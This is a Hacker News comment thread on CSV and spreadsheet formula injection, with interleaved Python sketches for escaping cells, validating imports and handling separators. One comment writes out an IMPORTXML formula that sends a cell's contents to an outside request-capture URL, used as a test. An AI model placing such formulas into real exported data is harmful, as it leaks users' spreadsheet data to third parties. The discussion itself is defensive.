Dangers of CSV Injection

645 points by rpenm, more than 7 years ago

24 comments

Dylan16807, more than 7 years ago
> Well, despite plentiful advice on StackOverflow and elsewhere, I’ve found only one (undocumented) thing that works with any sort of reliability: For any cell that begins with one of the formula triggering characters =, -, +, or @, you should directly prefix it with a tab character.

> Unfortunately that’s not the end of the story. The character might not show up, but it is still there. A quick string length check with =LEN(D4) will confirm that.

The documented way is prefixing with a ' character. It doesn't have the length issue either.

As to the root issue, I can't think of any perfect way to transfer a series of values between applications that apply different types to those values and applications that don't. At some point, something is going to have to guess.
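A minimal sketch of the prefixing approach discussed in this comment, assuming the producer controls CSV generation. The names `FORMULA_TRIGGERS`, `escape_cell` and `write_rows` are hypothetical, and whether a given spreadsheet application hides or honours the apostrophe is not verified here.

```python
import csv
import io

# The formula-triggering characters listed in the quoted article.
FORMULA_TRIGGERS = ("=", "-", "+", "@")


def escape_cell(value: str, prefix: str = "'") -> str:
    """Prefix a cell that starts with a formula-trigger character."""
    if value.startswith(FORMULA_TRIGGERS):
        return prefix + value
    return value


def write_rows(rows) -> str:
    """Serialise rows to CSV text, escaping every cell first."""
    buffer = io.StringIO()
    writer = csv.writer(buffer, lineterminator="\n")
    for row in rows:
        writer.writerow([escape_cell(str(cell)) for cell in row])
    return buffer.getvalue()
```

Note the trade-off: a legitimate negative number such as `-5` is also prefixed, so this only suits columns that are meant to be read as text.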
pavel_lishin, more than 7 years ago
Excel is the source of so many problems. At work, we ask users for an input in CSV or Excel format, and most people see "CSV" and export Excel data as CSV. Which is fine and great, but long numbers, such as UPCs, show up in Excel as scientific notation, being big scary numbers, *and also get exported as such*.

So when an Excel cell contains the UPC 123456123456, we get a CSV file that contains "1.23456E+11", which is worse than useless.
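One way an importer could at least catch this case is to reject identifier values that arrive in scientific notation, since the lost digits cannot be recovered. This is a sketch only; `SCI_NOTATION`, `looks_mangled` and `check_upc_column` are hypothetical names, not part of any system described in the comment.

```python
import re

# Matches values such as "1.23456E+11" that stand in for a long number.
SCI_NOTATION = re.compile(r"^[+-]?\d+(?:\.\d+)?[eE][+-]?\d+$")


def looks_mangled(value: str) -> bool:
    """True if the value is written in scientific notation."""
    return bool(SCI_NOTATION.match(value.strip()))


def check_upc_column(values):
    """Return (row index, value) pairs that look like mangled UPCs."""
    return [(i, v) for i, v in enumerate(values) if looks_mangled(v)]
```

The upload can then be refused with a message pointing at the offending rows instead of silently storing a truncated code.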
datenwolf, more than 7 years ago
The thing that puzzles me the most is that people use _C_SV at all. Separation by comma, or any other member of the printable subset of ASCII in the first place. What this essentially boils down to is ambiguous in-band signalling and a contextual grammar.

ASCII has addressed the problem of separating entries ever since its creation: separator control codes. There are:

x01 SOH "Start of Heading"
x02 STX "Start of Text"
x03 ETX "End of Text"
x04 EOT "End of Transmission"
x1C FS "File Separator"
x1D GS "Group Separator"
x1E RS "Record Separator"
x1F US "Unit Separator"

You can use those just fine for exchanging data as you would using CSV, but without the ambiguities of separation characters and the need to quote strings. Heck, if payload data is limited to the subset of ASCII/UTF-8 without control codes, you can just dump anything without the need for escaping or quoting.

So my suggestion is simple. Don't use CSV or "P"SV (printable separated values). Use ASV (ASCII separated values).
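The ASV idea can be sketched in a few lines, assuming US (x1F) separates fields and RS (x1E) separates records, and that payload data never contains those two codes. The function names `asv_dumps` and `asv_loads` are hypothetical.

```python
UNIT_SEP = "\x1f"    # US: separates fields within a record
RECORD_SEP = "\x1e"  # RS: separates records


def asv_dumps(rows) -> str:
    """Join rows of strings using the ASCII separator control codes."""
    for row in rows:
        for field in row:
            if UNIT_SEP in field or RECORD_SEP in field:
                raise ValueError("field contains a separator control code")
    return RECORD_SEP.join(UNIT_SEP.join(row) for row in rows)


def asv_loads(text: str):
    """Split ASV text back into rows; an empty string means zero records."""
    if text == "":
        return []
    return [record.split(UNIT_SEP) for record in text.split(RECORD_SEP)]
```

Commas, quotes and newlines inside fields need no escaping here; the cost is that the file is no longer comfortable to edit in a plain text editor.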
bitexploder, more than 7 years ago
I have been finding this vulnerability in apps since I started in infosec 10 years ago. I have seen it go any number of ways:

CSV -> import on web app -> SQLi
Malicious input -> CSV download from web app -> Excel -> formula -> sneaky data exfil
CSV -> JS -> import into web app -> XSS (in places no other XSS existed because of the data)
CSV import -> weird CSV header -> arbitrary data loading (headers were column names): schema injection, like SQLi only more hilarious

Point is, apps and devs can have blind spots (knowledge gaps) or just not think of a CSV import or export like other functionality.
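For the first and last chains in that list, one common defence is to check the CSV header against an allow-list and to bind cell values as query parameters. The sketch below assumes SQLite and a hypothetical `users` table with `name` and `email` columns; `ALLOWED_COLUMNS` and `import_csv` are illustrative names.

```python
import csv
import io
import sqlite3

ALLOWED_COLUMNS = {"name", "email"}  # hypothetical schema for illustration


def import_csv(conn: sqlite3.Connection, csv_text: str) -> int:
    """Insert CSV rows into users; returns the number of rows inserted."""
    reader = csv.DictReader(io.StringIO(csv_text))
    columns = reader.fieldnames or []
    # Header names end up in the SQL text, so they must come from the allow-list.
    if (not columns
            or len(set(columns)) != len(columns)
            or any(c not in ALLOWED_COLUMNS for c in columns)):
        raise ValueError(f"unexpected CSV header: {columns}")
    column_list = ", ".join(columns)
    placeholders = ", ".join("?" for _ in columns)
    sql = f"INSERT INTO users ({column_list}) VALUES ({placeholders})"
    # Cell values are bound as parameters and never spliced into the SQL.
    rows = [tuple(row[c] for c in columns) for row in reader]
    conn.executemany(sql, rows)
    return len(rows)
```

This does nothing for the export-to-Excel chain, which needs output escaping on the producer side or safer handling in the spreadsheet.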
kristofferR, more than 7 years ago
CSV is hell. Some idiot somewhere decided that Comma Separated Values in certain locales should be based on semicolons (who would have thought files would be shared across country borders!?), so when we open CSV files that are actually comma separated, all the information is in the first cell (until a semicolon appears).

To get comma separated CSVs to show properly in Excel we have to mess around with OS language settings. CSV as a format should have died years ago; it's a shame so many apps/services only export CSV files. Many developers (mainly US/UK based) are probably not aware of how much of a headache they inflict on people in other countries by using CSV files.
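A consumer that cannot rely on locale settings can guess the separator from the data itself. The sketch below is a simple heuristic, not what Excel does: it picks the candidate that splits every row into the same number of fields. `detect_delimiter` is a hypothetical name; Python's standard library also ships `csv.Sniffer` for the same purpose.

```python
import csv
import io


def detect_delimiter(text: str, candidates=(",", ";", "\t")) -> str:
    """Pick the candidate giving a consistent field count greater than one."""
    best, best_width = None, 1
    for delimiter in candidates:
        rows = list(csv.reader(io.StringIO(text), delimiter=delimiter))
        widths = {len(row) for row in rows if row}
        if len(widths) == 1:
            width = widths.pop()
            if width > best_width:
                best, best_width = delimiter, width
    if best is None:
        raise ValueError("could not determine the delimiter")
    return best
```

For a semicolon-separated file with decimal commas, such as `name;price` followed by `widget;1,50`, the comma is rejected because it yields uneven rows.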
splike, more than 7 years ago
Interestingly, genetic biologists are probably more aware of this problem than most. When importing a CSV containing gene names such as SEPT2 or MARCH1, they automatically get converted to dates by Excel. This has potentially had a fairly large effect on research in the area [1]. One of the many reasons we insist on only using Ensembl IDs for genes at my company.

[1] https://genomebiology.biomedcentral.com/articles/10.1186/s13059-016-1044-7
jkabrg, more than 7 years ago
Slightly off-topic, but maybe we need a fully standardized and unambiguous CSV dialect with its own file extension. Or maybe just use SQLite tables or Parquet?

Some things I dislike about CSV:

* No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.
* I'm not a fan of the empty field. Pandas thinks it's a floating point NaN, while R doesn't. So is it a NaN? Is it an empty string? Does it mean Not Applicable? Does it mean Don't Know? Maybe it should be removed altogether.
* No agreement about escape characters.
* No agreement about separator characters.
* No agreement about line endings.
* No agreement about encoding. Is it ASCII, or UTF-8, or UTF-16, or Latin-whatever?
* None of the choices above are made explicit in the file itself. They all have the same extension "CSV".

These use up a bit of time whenever I get a CSV from a colleague, or even when I change operating system. Sometimes I end up clobbering the file itself.

Good things:

* Human readable.
* Simple.

I think the addition of some rules, and a standard interpretation of them, could go some way to improving the format.
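Until such a standard exists, a producer and consumer can at least agree on one dialect and spell out every choice in code. The sketch below uses Python's `csv` module; the dialect name `strict-csv` and the helpers `dumps` and `loads` are hypothetical, and the particular choices (comma, double quotes, CRLF) are assumptions rather than a recommendation from the comment.

```python
import csv
import io

# Every choice the list above calls ambiguous is stated explicitly.
csv.register_dialect(
    "strict-csv",
    delimiter=",",
    quotechar='"',
    doublequote=True,       # a quote inside a field is written as ""
    quoting=csv.QUOTE_ALL,  # every field is quoted, so "" is visibly an empty string
    lineterminator="\r\n",
    strict=True,            # raise csv.Error on malformed input
)


def dumps(rows) -> str:
    """Write rows of strings using the agreed dialect."""
    buffer = io.StringIO(newline="")
    csv.writer(buffer, dialect="strict-csv").writerows(rows)
    return buffer.getvalue()


def loads(text: str):
    """Read text produced by dumps back into rows of strings."""
    return list(csv.reader(io.StringIO(text, newline=""), dialect="strict-csv"))
```

When writing to disk, the encoding would be fixed the same way, for example `open(path, "w", encoding="utf-8", newline="")`. Types and the meaning of an empty field still have to be agreed outside the file.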
fulafel, more than 7 years ago
This is foremost a vulnerability in Excel and Google Sheets, like the article concludes, though it warrants workarounds in CSV producers.

Why would these apps go off executing code from a text file? How odd.

Is there a way to tell Excel or Sheets to open a CSV file without executing code?
top_post, more than 7 years ago
Sorry to balk, but I'm more outraged at the title: yet another "injection" I need to talk about that isn't really one. The root cause is the interpreter executing untrusted input; the same can be said about macros or any other file type. The perception is that most people open CSV files on a regular basis and assume they are safe and not interpreted, when it appears they are.
Cyranix, more than 7 years ago
This seems like an appropriate place to suggest that anyone who finds these kinds of attack vectors interesting should check out the bug bounty program for my current place of work, which processes loads of CSV and Excel files from government customers.

https://bugcrowd.com/socrata

(But please, just do me a small favor and don't submit any reports for SQL injection or information disclosure if you're using the SQL-like API that we expressly provide for the purpose of accessing public data. We get a couple of clueless people sending such reports every week.)
Swizec, more than 7 years ago
This brings XSS to a whole new level. Imagine what happens if you know some of what you post in a website as a user eventually gets reviewed by somebody who gets it through a CSV dump.

Makes me wanna troll ops people at my own startup just for funsies.
Mortiffer, more than 7 years ago
In case anyone else was wondering about Google Forms: I tried inputting =IMPORTXML(CONCAT("https://requestb.in/15z4vk51?f=",H8),"//a") into a text field, and Google automatically prepends a "'" so that '=IMPORTXML does not execute.
jaclaz, more than 7 years ago
At least here (Italy) CSV is not commonly used (because of the different way we use the comma as a decimal point) and the default (in Excel) separator is then set to a semicolon.

A more common format is TSV (TAB delimited), which makes a lot more sense. However, the best choice when importing data in Excel is still to change the file extension to a non-recognized extension (like, say, .txt) and in the "import wizard" set the appropriate separator and set all columns as "text".
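Outside Excel, the same "explicit separator, every column as text" import can be sketched with Python's `csv` module, which never converts field types on its own. `read_tsv_as_text` is a hypothetical helper name, and treating quotes as ordinary characters is an assumption about the TSV producer.

```python
import csv
import io


def read_tsv_as_text(text: str):
    """Parse TAB-delimited text; every field stays a plain string."""
    reader = csv.reader(
        io.StringIO(text, newline=""),
        delimiter="\t",
        quoting=csv.QUOTE_NONE,  # quotes are ordinary characters here
    )
    return [row for row in reader]
```

Values such as `SEPT2` or `123456123456` come back unchanged, because nothing in this path guesses at dates or numbers.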
captn3m0, more than 7 years ago
On the first attack vector: Google Security has a nice post about it [0] and why they do not consider it a valid threat. This is their reasoning:

> CSV files are just text files (the format is defined in RFC 4180) and evaluating formulas is a behavior of only a subset of the applications opening them - it's rather a side effect of the CSV format and not a vulnerability in our products which can export user-created CSVs. This issue should mitigated by the application which would be importing/interpreting data from an external source, as Microsoft Excel does (for example) by showing a warning. In other words, the proper fix should be applied when opening the CSV files, rather then when creating them.

[0]: https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection

Their policy makes it sound like the second vulnerability should indeed be fixed in Google Sheets itself (it is the one opening the file, after all).
jonnycomputer, more than 7 years ago
CSV is a mess (are a mess?), but all these vulnerabilities have to do with spreadsheet applications' consumption of CSVs. There are very legitimate reasons a CSV might include fragments of potentially executable code, after all.
filereaper, more than 7 years ago
I'd be curious if anyone has hit exploits with CSV files and bulk ingestion into data warehouses (e.g. Redshift, Greenplum, etc.) as opposed to Excel.

CSVs are still the most portable format for moving data around despite all of their evils of escaping characters, comma delimitation, etc.

A lot of old legacy systems know CSV, and it's easy to inspect visually compared to more efficient binary formats like ORC or Parquet.
tatersolid, more than 7 years ago
Like it or not, Excel’s behavior defines the CSV file format and how it is used in the real world. The writing of an RFC 15 years too late has not and will never “fix” CSV. It’s crusted over with bugs and inconsistencies for all time.

Use anything else, even XLSX, which is at least a typed and openly standardized format.
stepri, more than 7 years ago
When you import a CSV file into Google Sheets (File -> Import), you can choose in the dialog to convert text to numbers and dates. If you choose not to convert, Google Sheets places a single quote (') before the function.
ecesena, more than 7 years ago
Does anybody know any good library that solves the problem, in any language?
ComodoHacker, more than 7 years ago
My Excel 2010 doesn't execute shell code from the author's example. Heck, it doesn't even parse CSV and loads everything into one column as text. What am I doing wrong?
TAForObvReasons, more than 7 years ago
CSV is a pretty poor format in that it mixes the presentation and the underlying values. There is no standard for dates (dd/mm/yyyy or mm/dd/yyyy?). The "standard" RFC 4180 is extremely vague when discussing value interpretation. As proprietary as XLSX is, at least the Excel format separates the raw values from the presentation.
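The date ambiguity is easy to demonstrate. The sketch below tries both readings of a slash-separated date and returns every calendar date the text could mean; `possible_dates` is a hypothetical helper name.

```python
from datetime import datetime


def possible_dates(text: str):
    """Return every date text could mean as dd/mm/yyyy or mm/dd/yyyy."""
    results = set()
    for fmt in ("%d/%m/%Y", "%m/%d/%Y"):
        try:
            results.add(datetime.strptime(text, fmt).date())
        except ValueError:
            pass  # not a valid date under this format
    return sorted(results)
```

A value like `03/04/2017` yields two candidates (3 April and 4 March), while `25/12/2017` yields one, so a consumer can only detect the problem, not resolve it, without out-of-band knowledge of the producer's locale.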
beached_whale, more than 7 years ago
Excel protects against this; at least mine (v2013) does.
jasonmaydie, more than 7 years ago
Shouldn't this be the dangers of Excel? CSVs are benign.
hutch120, more than 7 years ago
Little Bobby Tables reminds us to sanitize our database inputs.

https://imgs.xkcd.com/comics/exploits_of_a_mom.png